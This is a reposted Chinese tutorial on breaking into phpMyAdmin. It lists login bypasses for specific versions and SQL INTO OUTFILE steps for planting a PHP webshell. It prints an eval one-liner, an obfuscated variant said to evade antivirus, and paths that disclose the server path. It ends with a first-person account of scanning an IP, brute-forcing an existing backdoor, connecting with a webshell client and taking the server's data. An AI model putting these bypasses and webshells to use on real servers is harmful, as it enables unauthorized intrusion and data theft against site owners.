首页 > 数据库 > php我的管理员 > 分析PHPmyadmin漏洞以及拿shell的介绍

分析PHPmyadmin漏洞以及拿shell的介绍

藏色散人
发布: 2021-02-10 15:13:37
转载
3937 人浏览过

下面由phpmyadmin教程栏目给大家介绍关于PHPmyadmin漏洞和拿shell,希望对需要的朋友有所帮助!

分析PHPmyadmin漏洞以及拿shell的介绍

phpmyadmin的漏洞相对来说,还是比较多的,对于新手来说,分享几个漏洞,深入的处于代码审计方面的也可以和我讨论
phpmyadmin2.11.3-2.11.4 这两个版本存在万能密码,直接使用‘localhost’@'@”为账号,密码不用输入。

phpmyadmin2.11.9.2 这个版本存在空口令。直接root用户登陆,密码不用

找这个的话 用自己的写的脚本,或者搜素引擎什么的,这里懂的人就懂了,不懂也不在这里。

关于拿shell,----》root权限,并且有写文件权限 ----》导出的目录有写权限 ----》有的情况下,就算你这两个都有,但是服务器的一些配置还是会对这个有影响。

在getshell之前先进入一个数据库

第一种,使用sql语句,创建一个表,添加一个字段,字段的内容为一句话,然后导出到php文件中,最后删除这个表,这个是最保险的方法
Create TABLE 表 (列 text NOT NULL)
Insert INTO 表 (列) VALUES('')
select 列 from 表 into _utfile '路径'
Drop TABLE IF EXISTS 表;
第二种方法,这个是直接写入
select '一句话'INTO _UTFILE '路径'
还有几种方法,大致原理都一样。
然后,一般的话,一句话都是

<span style="font-size: 16px;"><?php @eval($_POST[x])?><br/></span>
登录后复制

有狗的话,用免杀一句话,下面这个是我过年前构造的过狗一句话,现在应该还可以过

<span style="font-size: 16px;"><?php<br/> $a = &#39;s&#39;;<br/> $str = str_repeat($a,2);<br/> $to = $_POST;<br/> //echo $str;<br/> $exp = &#39;a&#39;.$str[0].$str[1].&#39;e&#39;.&#39;r&#39;.&#39;t&#39;;<br/> $exp($to[&#39;x&#39;])<br/> ?><br/></span>
登录后复制

找路径的话,

<span style="font-size: 16px;">1// 利用phpinfo.php<br/> 2//利用phpmyadmin的一些文件报错,下面都是网上通用的<br/> /phpMyAdmin/index.php?lang[]=1<br/> /phpMyAdmin/phpinfo.php<br/> /load_file()<br/> /phpmyadmin/themes/darkblue_orange/layout.inc.php<br/> /phpmyadmin/libraries/select_lang.lib.php<br/> /phpmyadmin/libraries/lect_lang.lib.php<br/> /phpmyadmin/libraries/mcrypt.lib.php<br/> /phpmyadmin/libraries/export/xls.php<br/></span>
登录后复制

3//再者就是利用网站包路径,这些会的都会了,不会的慢慢的就会了。

下面开始实战,脚本扫到一个IP,显示存在phpmyadmin,打开


一看这些php文件就是后门一句话,放到几万字典爆破,两秒钟


直接菜刀链接。。。。。
这个肯定被人搞了,直接打包好东西,你懂的。。。提权什么的就不必要了。


以上是分析PHPmyadmin漏洞以及拿shell的介绍的详细内容。更多信息请关注PHP中文网其他相关文章!

相关标签:
来源:csdn.net
本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板